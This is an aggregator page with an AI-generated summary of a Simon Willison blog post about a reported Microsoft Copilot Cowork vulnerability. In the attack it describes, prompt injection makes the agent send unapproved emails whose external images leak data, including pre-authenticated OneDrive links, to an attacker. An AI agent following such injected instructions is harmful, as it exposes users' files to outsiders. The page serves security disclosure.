T
traeai
Sign in
返回首页
Simon Willison's Weblog

Microsoft Copilot Cowork Data Leak Vulnerability

7.5Score

TL;DR · AI Summary

Microsoft Copilot Cowork allows agents to send unapproved emails to the user's inbox, and these emails may leak data through external images that trigger network requests to external websites.

Key Takeaways

  • Microsoft Copilot Cowork allows agents to send unapproved emails to the user's i
  • External images in these emails may trigger network requests and lead to data le
  • OneDrive can create pre-authenticated download links, and successful prompt inje

Outline

Jump quickly between sections.

  1. §Background Introduction

    Introduce the features and design goals of Microsoft Copilot Cowork.

  2. ·Issue Discovery

    Point out the security vulnerability in how Copilot Cowork handles emails sent by agents.

  3. Vulnerability Analysis

    Analyze the specific manifestation and potential risks of the vulnerability.

  4. Impact Assessment

    Assess the possible impact of this vulnerability on users and organizations.

  5. Solution Exploration

    Propose possible solutions and improvement measures.

Mindmap

See how the topics connect at a glance.

查看大纲文本(无障碍 / 无 JS 友好)
  • Microsoft Copilot Cowork 数据泄露漏洞
    • 代理发送未经批准的电子邮件
    • 外部图像触发网络请求
    • 数据泄露风险

Highlights

Key sentences worth saving and sharing.

  • Because these messages can contain external images that trigger network requests to external websites, data can be exfiltrated when a user opens a compromised message sent by the agent.

    Paragraph 3

    ⬇︎ 下载 PNG𝕏 分享到 X
#Microsoft Copilot Cowork#Data Leak#Cybersecurity
Open original article

26th May 2026 - Link Blog

[Microsoft Copilot Cowork Exfiltrates Files](https://www.promptarmor.com/resources/microsoft-copilot-cowork-exfiltrates-files) ([via](https://news.ycombinator.com/item?id=48272354 "Hacker News")) The biggest challenge in designing agentic systems continues to be preventing them from enabling attackers to exfiltrate data.

In this case Microsoft Copilot Cowork (yes, that's a real product name) was allowing agents to send emails to the user's own inbox without approval... but those messages were then displayed in a way that could leak data to an attacker via rendered images:

Because these messages can contain external images that trigger network requests to external websites, data can be exfiltrated when a user opens a compromised message sent by the agent.

Since OneDrive can create pre-authenticated download links, a successful prompt injection could cause those links to be leaked, allowing files to be downloaded by the attacker.

AI may generate inaccurate information. Please verify important content.